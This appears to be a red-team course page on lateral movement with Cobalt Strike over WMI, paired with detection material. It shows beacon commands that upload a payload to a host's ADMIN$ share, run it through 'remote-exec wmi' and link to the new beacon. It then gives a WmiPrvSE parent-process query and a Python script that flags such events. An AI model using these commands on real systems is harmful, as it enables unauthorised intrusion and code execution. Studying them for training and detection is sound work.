
# Windows Management Instrumentation (WMI)

As you may have noticed, WMI is not part of the `jump` command, but it is part of `remote-exec`. The `remote-exec` method uses WMI's "process call create" to execute any command we specify on the target. The most straightforward way to use this is to upload a payload to the target system and use WMI to execute it.

You can upload a file to a remote machine by `cd`'ing to the desired UNC path and then using the `upload` command.

```
beacon> cd \\web.dev.cyberbotic.io\ADMIN$
beacon> upload C:\Payloads\smb_x64.exe
beacon> remote-exec wmi web.dev.cyberbotic.io C:\Windows\smb_x64.exe
Started process 3280 on web.dev.cyberbotic.io
```


The process is now running on WEB, so we need to connect to it with `link`.

```
beacon> link web.dev.cyberbotic.io TSVCPIPE-81180acb-0512-44d7-81fd-fbfea25fff10
[+] established link to child beacon: 10.10.122.30
```


As with WinRM, the process will be running in an elevated context of the calling user.

![](https://files.cdn.thinkific.com/file_uploads/584845/images/bc3/047/089/wmi.png)


When a binary is executed via WMI in this way, it will be a child of `WmiPrvSE.exe`. We can therefore look for process create events where WmiPrvSE is the parent.

```
event.category: process and event.type: start and process.parent.name: WmiPrvSE.exe
```


![](https://files.cdn.thinkific.com/file_uploads/584845/images/f3c/c95/e2c/wmiprvse.png)
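The same parent-process check can be run offline over exported events. The following is an added example, not part of the original page: it assumes ECS-style JSON lines, uses constructed sample events, and additionally marks children whose image sits directly in `C:\Windows`, the directory the `ADMIN$` upload above lands in.

```python
import json
import ntpath

# Constructed ECS-style process events, one JSON document per line (sample data).
SAMPLE_EVENTS = r"""
{"event":{"category":["process"],"type":["start"]},"host":{"name":"web"},"process":{"pid":3280,"executable":"C:\\Windows\\smb_x64.exe","parent":{"name":"WmiPrvSE.exe"}}}
{"event":{"category":"process","type":"start"},"host":{"name":"web"},"process":{"pid":4112,"executable":"C:\\Windows\\System32\\notepad.exe","parent":{"name":"explorer.exe"}}}
{"event":{"category":"process","type":"start"},"host":{"name":"web"},"process":{"pid":5020,"executable":"C:\\Program Files\\Vendor\\agent.exe","parent":{"name":"wmiprvse.exe"}}}
{"event":{"category":"process","type":"end"},"host":{"name":"web"},"process":{"pid":3280,"executable":"C:\\Windows\\smb_x64.exe","parent":{"name":"WmiPrvSE.exe"}}}
"""

ADMIN_SHARE_DIR = r"c:\windows"  # assumption: ADMIN$ maps to C:\Windows, as on this page


def _has(value, wanted):
    """ECS allows event.category and event.type to be a string or a list."""
    values = value if isinstance(value, list) else [value]
    return wanted in values


def wmi_children(lines):
    """Return process-start events whose parent is WmiPrvSE.exe."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        doc = json.loads(line)
        event = doc.get("event", {})
        proc = doc.get("process", {})
        if not (_has(event.get("category"), "process") and _has(event.get("type"), "start")):
            continue
        parent = (proc.get("parent") or {}).get("name") or ""
        if parent.lower() != "wmiprvse.exe":  # Windows image names are case-insensitive
            continue
        exe = proc.get("executable", "")
        hits.append({
            "host": doc.get("host", {}).get("name"),
            "pid": proc.get("pid"),
            "executable": exe,
            # True when the binary sits directly in the ADMIN$ directory
            "in_admin_share": ntpath.dirname(exe).lower() == ADMIN_SHARE_DIR,
        })
    return hits


if __name__ == "__main__":
    for hit in wmi_children(SAMPLE_EVENTS.splitlines()):
        print(hit)
```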

